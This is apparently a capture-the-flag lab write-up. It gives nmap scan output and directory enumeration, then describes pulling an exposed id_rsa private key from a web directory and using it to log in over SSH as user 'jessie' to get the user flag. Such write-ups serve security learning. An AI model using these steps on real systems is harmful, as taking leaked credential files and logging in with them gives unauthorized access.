Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 08:39 EDT Nmap scan report for 10.10.164.53 Host is up (0.050s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA) | 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA) |_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=5/16%OT=22%CT=1%CU=36653%PV=Y%DS=2%DC=T%G=Y%TM=5EBFDF2 OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)OPS( OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11 OS:NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN( OS:R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= OS:S)
We finds that there are directories like sitemap which lead us to a different page
Dirs found with a 200 response:
/ /sitemap/ /sitemap/.ssh/ /sitemap/images/ /sitemap/js/ /sitemap/css/ /sitemap/fonts/ /sitemap/fonts/bootstrap/ /sitemap/fonts/icomoon/
Dirs found with a 403 response:
/.hta/ /.htaccess/ /.htpasswd/ /icons/ /icons/.htaccess/ /icons/.htpasswd/ /icons/.hta/ /server-status/ /sitemap/.hta/ /sitemap/.htaccess/ /sitemap/.htpasswd/ /sitemap/.ssh/.hta/ /sitemap/.ssh/.htaccess/ /sitemap/.ssh/.htpasswd/ /sitemap/images/.hta/ /sitemap/images/.htpasswd/ /sitemap/images/.htaccess/ /sitemap/js/.hta/ /sitemap/js/.htaccess/ /sitemap/js/.htpasswd/ /icons/small/ /icons/small/.htpasswd/ /icons/small/.hta/
We find the user's name is Jessie most probably because there is a comment which comments this person to do something
With the open directories, we can see that the sitemap/.ssh is accessible and it has an id_rsa key in it and we can use that to try to login with this Jessie person and get access to the machine for that we go to sitemap/.ssh and copy the id_rsa file into id_rsa file for using our local machine and we will have to change its permissions mode to chmod 600 id_rsa then we can do
ssh -i id_rsa jessie@$IP
and we get access to the machine and we can get the user flag.